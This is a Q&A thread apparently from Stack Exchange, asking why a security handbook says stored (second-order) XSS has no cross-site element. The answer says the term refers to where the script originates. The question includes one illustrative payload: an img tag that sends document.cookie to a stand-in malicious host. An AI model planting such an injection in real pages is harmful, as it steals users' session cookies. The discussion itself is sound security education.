# Why do some consider 2nd-order (aka persistent) XSS to not be true XSS?

Tags: security, xss

I'm reading "The Web Application Hacker's Handbook", and it talks about the differences between 1st-order (aka reflected) XSS and 2nd-order (aka persistent) XSS.  It mentions how reflected XSS takes advantage of incomplete or nonexistent sanitization of query string params to execute arbitrary scripts into the user's DOM without persisting any malicious code to the application's database, and how 2nd-order XSS does in fact persist that malicious code, to be executed in the user's DOM at some later time.

My question relates to the author's desription of 2nd-order XSS (on page 438, if you've got a copy handy).  The description from the book states that:

> Attacks against stored XSS vulnerabilities typically involve at least
>   two requests to the application. In the first, the attacker posts some
>   crafted data containing malicious code that the application stores. In
>   the second, a victim views a page containing the attacker’s data, and
>   the malicious code is executed when the script is executed in the
>   victim’s browser. For this reason, the vulnerability is also sometimes
>   called second-order cross-site scripting. **(In this instance, “XSS” is
>   really a misnomer, because the attack has no cross-site element.** [emphasis mine] The
>   name is widely used, however, so we will retain it here.)

In 2nd-order XSS, the malicious code that the attacker still injects is (presumably) still some arbitrary script pointing to an external server (for example, injecting an `img` tag with a src attribute of `"http://www.malicioussite.dom" + document.cookie`).  I'm confused why the author then states that this attack has no cross-site element.  Making a request to the malicious external server seems to me like a proper cross-site element.  Am I missing something?

Answer (score 1, accepted):

To me, 'cross-site' in XSS means that the malicious script itself is directly sent from another site. Like for example in case of reflected XSS on an url parameter, a malicious website A.com can craft a link to the victim website B.com with its attack in a vulnerable parameter of B, and when a user visits A and clicks the link, he will execute the script on B.

So I think it's not about what the malicious script is doing, it's where it comes from (and how).

In case of stored XSS, the script is usually entered on the vulnerable website directly, however that may not always be the case, such maintaining the original 'cross-site' element. But it doesn't matter, the name is the same, because the underlying problem and also the solution in code are the same, so the name of the vulnerability is the same too. :)

Whatever people call it though, the important thing is to avoid it. :)